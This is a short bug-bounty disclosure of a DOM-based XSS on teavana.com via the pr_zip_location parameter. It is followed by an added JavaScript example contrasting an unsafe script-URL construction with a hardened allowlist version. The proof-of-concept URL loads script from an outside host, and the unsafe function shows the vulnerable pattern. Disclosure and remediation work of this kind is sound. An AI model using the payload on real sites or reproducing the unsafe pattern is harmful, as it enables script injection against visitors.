Starbucks: DOM XSS on teavana.com via "pr_zip_location" parameter
Hello Starbucks team, I've discovered DOM XSS on teavana.com involving the pr_zip_location URL parameter. PoC: http://www.teavana.com/us/en/tea/green-tea/winterberry-tea-blend-32601.html?pr_zip_location=//whitehat-hacker.com/xss.j? Works in all major browsers. Vulnerable code is in full.js: js var DR =...
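
An added example, not part of the original report and not code from full.js (which is cut off above): it assumes the pr_zip_location value is concatenated into the URL of a script the page loads, which the PoC suggests but the page does not show. The function names, the /pr/ path, locations.js and the reviews.example origin are hypothetical placeholders.

```javascript
// Hypothetical origin the page is supposed to load its script from (assumption).
const SCRIPT_ORIGIN = "https://reviews.example";
// A ZIP location should only ever be a US ZIP or ZIP+4 code.
const ZIP_RE = /^\d{5}(?:-\d{4})?$/;

// Read pr_zip_location from a query string; return null unless it is a ZIP code.
function readZipLocation(search) {
  const value = new URLSearchParams(search).get("pr_zip_location");
  return value !== null && ZIP_RE.test(value) ? value : null;
}

// Assumed unsafe pattern: the raw value becomes the leading part of a script URL.
// A value starting with "//" is protocol-relative, so the URL parser takes the
// host from the parameter, and a trailing "?" pushes the fixed suffix into the
// query string where it no longer matters.
function unsafeScriptUrl(search, pageUrl) {
  const value = new URLSearchParams(search).get("pr_zip_location") || "/pr/zip";
  return new URL(value + "/locations.js", pageUrl).href;
}

// Hardened pattern: allowlist the value, place it in the URL as an encoded path
// segment under a fixed origin, and re-check the origin before using the result.
function safeScriptUrl(search) {
  const zip = readZipLocation(search);
  if (zip === null) return null;
  const url = new URL("/pr/" + encodeURIComponent(zip) + "/locations.js", SCRIPT_ORIGIN);
  return url.origin === SCRIPT_ORIGIN ? url.href : null;
}
```

Only the return value of safeScriptUrl should ever be assigned to a script element's src; a null result means the parameter is ignored.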